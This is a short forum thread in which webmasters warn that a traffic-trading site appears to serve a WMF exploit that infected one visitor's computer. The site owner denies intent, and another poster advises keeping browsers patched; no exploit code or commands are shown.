i've notified sherm about this, i dont know if he's doing it on purpose or not. but the following appears in his source.

my computer is already fucked, im posting from my laptop, but i guess thats what i get for using IE on my comp... heh... anyways, it downloads a file called xpl.wmf (windows media file) and runs an exploit which autoinstalls a bunch of shit, and in my case, totally fucked up my computer,it doesnt even boot up...

im gonna dissassemble the file and see exactly what its doing, so for everybody trading traffic with sherms shack, beware, might wanna pull your links until this problem is resolved.

i'll keep you posted on what i find.. and i hope this was just a mistake on sherms part and not done on purpose.. surfers dont need to get fucked further.

I've been in this biz since 99, and the last thing I would do is tarnish my reputation. I'm looking into this, but is seems as if there may be a script exploit that needs to be patched. I've narrowed it down pretty good, but I will msg the script's maker before going on a public message board and calling him an idiot.

the wmf exploit has been out for ages, if your getting hit with that then it was bound to happen eventually. keep your system patched.. if you run firefox unpatched you would be in the same boat
